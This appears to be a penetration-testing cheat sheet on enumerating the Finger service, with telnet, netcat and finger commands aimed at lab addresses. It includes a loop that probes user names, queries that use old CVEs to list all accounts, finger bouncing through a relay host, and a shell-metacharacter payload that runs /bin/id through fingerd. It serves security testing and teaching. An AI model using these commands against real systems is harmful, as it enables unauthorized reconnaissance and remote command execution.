Name/Finger (User Information Protocol) Service Enumeration

Finger (User Information Protocol)

At a Glance

Default Port: 79

The Finger User Information Protocol (RFC 1288), is a simple protocol that provides an interface to a remote user information program (RUIP). 1

Telnet

telnet 10.0.0.3 79

Netcat

echo "root" | nc -n 10.0.0.3 79

Enumeration

Tools

Fast Enum

for q in 'root' 'admin' 'user' '0' "'a b c d e f g h'" '|/bin/id';do echo "FINGER: $q"; finger "$q@10.0.0.3"; echo -e "\n";done

Finger 2

List logged users.

finger @10.0.0.3

Finger a specific user.

finger -l root@10.0.0.3

Enumerate users containing user.

finger -l user@10.0.0.3

Note: Try other words as: admin, account or project.

Parameters
  • -l: Multi-line format. Displays all the information.

Finger Zero 3

fingerd may respond to finger 0@<host> with information on some user accounts.

finger 0@10.0.0.3

Finger ‘a b c d e f g h’ 4

fingerd may respond to 'a b c d e f g h'@<host> with information on all accounts.

finger 'a b c d e f g h'@10.0.0.3

Finger Bouncing 5

finger can be used to relay a request to a different host as if it were sent from that machine.

finger @10.0.0.3@10.10.10.4
finger root@10.0.0.3@10.10.10.4

Command Execution 6

fingerd allows remote command execution through shell metacharacters.

finger "|/bin/id@10.0.0.3"

Refer to Exploits Search


  1. “RFC 1288 - The Finger User Information Protocol.” IETF Tools, https://tools.ietf.org/html/rfc1288. ↩︎

  2. “Finger(1): User Info Lookup Program.” Linux Documentation, https://linux.die.net/man/1/finger. ↩︎

  3. “CVE - CVE-1999-0197.” CVE - Common Vulnerabilities and Exposures (CVE), https://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0197. ↩︎

  4. “CVE - CVE-2001-1503.” CVE - Common Vulnerabilities and Exposures (CVE), https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1503. ↩︎

  5. “‘Solaris 2.7 Allows Finger Bouncing’ .” SecuriTeam, 15 Jan. 1999, https://securiteam.com/exploits/2BUQ2RFQ0I/. ↩︎

  6. “CVE - CVE-1999-0152.” CVE -  Common Vulnerabilities and Exposures (CVE), https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0152. ↩︎